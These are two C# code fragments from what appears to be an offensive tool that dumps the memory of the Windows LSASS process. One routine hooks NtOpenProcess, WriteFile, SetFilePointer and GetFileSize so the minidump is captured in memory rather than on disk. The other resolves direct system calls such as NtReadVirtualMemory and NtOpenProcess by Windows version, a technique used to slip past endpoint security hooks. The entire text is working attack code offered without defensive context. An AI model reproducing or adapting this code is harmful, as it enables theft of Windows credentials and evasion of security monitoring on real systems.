internal static void InitHookEngine(IntPtr contextHandle, uint dumpSizeLimit, int lsassPid, IntPtr lsassHandle) { hookEngine = new HookEngine(); dumpContexts[contextHandle] = new DumpContext(dumpSizeLimit); MiniDumpToMem.lsassPid = lsassPid; MiniDumpToMem.lsassHandle = lsassHandle; SetFilePointer_detour = new SetFilePointerDelegate(SetFilePointer); GetFileSize_detour = new GetFileSizeDelegate(GetFileSize); WriteFile_detour = new WriteFileDelegate(WriteFile); NtOpenProcess_detour = new NtOpenProcessDelegate(NtOpenProcess); NtOpenProcess_orig = hookEngine.CreateHook("ntdll.dll", "NtOpenProcess", NtOpenProcess_detour); SetFilePointer_orig = hookEngine.CreateHook("kernelbase.dll", "SetFilePointer", SetFilePointer_detour); GetFileSize_orig = hookEngine.CreateHook("kernelbase.dll", "GetFileSize", GetFileSize_detour); WriteFile_orig = hookEngine.CreateHook("kernelbase.dll", "WriteFile", WriteFile_detour); hookEngine.EnableHooks(); }
static Syscall() { var windowsVersion = OsChecker.GetWindowsVersion(); if (windowsVersion == OsChecker.EWindowsVersion.Unknown || !Syscalls.ContainsKey(windowsVersion)) { throw new Exception("Unsupported operating system !"); } fNtOpenProcess = GetDelegateForSyscall <NtOpenProcessDelegate>(Syscalls[windowsVersion].NtOpenProcess); fNtReadVirtualMemory = GetDelegateForSyscall <NtReadVirtualMemoryDelegate>(Syscalls[windowsVersion].NtReadVirtualMemory); fNtWriteVirtualMemory = GetDelegateForSyscall <NtWriteVirtualMemoryDelegate>(Syscalls[windowsVersion].NtWriteVirtualMemory); fNtAllocateVirtualMemory = GetDelegateForSyscall <NtAllocateVirtualMemoryDelegate>(Syscalls[windowsVersion].NtAllocateVirtualMemory); fNtProtectVirtualMemory = GetDelegateForSyscall <NtProtectVirtualMemorDelegate>(Syscalls[windowsVersion].NtProtectVirtualMemory); fNtFreeVirtualMemory = GetDelegateForSyscall <NtFreeVirtualMemoryDelegate>(Syscalls[windowsVersion].NtFreeVirtualMemory); fNtClose = GetDelegateForSyscall <NtCloseDelegate>(Syscalls[windowsVersion].NtClose); fNtQueryInformationProcess = GetDelegateForSyscall <NtQueryInformationProcessDelegate>(Syscalls[windowsVersion].NtQueryInformationProcess); fNtOpenThread = GetDelegateForSyscall <NtOpenThreadDelegate>(Syscalls[windowsVersion].NtOpenThread); fNtSuspendThread = GetDelegateForSyscall <NtSuspendThreadDelegate>(Syscalls[windowsVersion].NtSuspendThread); fNtResumeThread = GetDelegateForSyscall <NtResumeThreadDelegate>(Syscalls[windowsVersion].NtResumeThread); }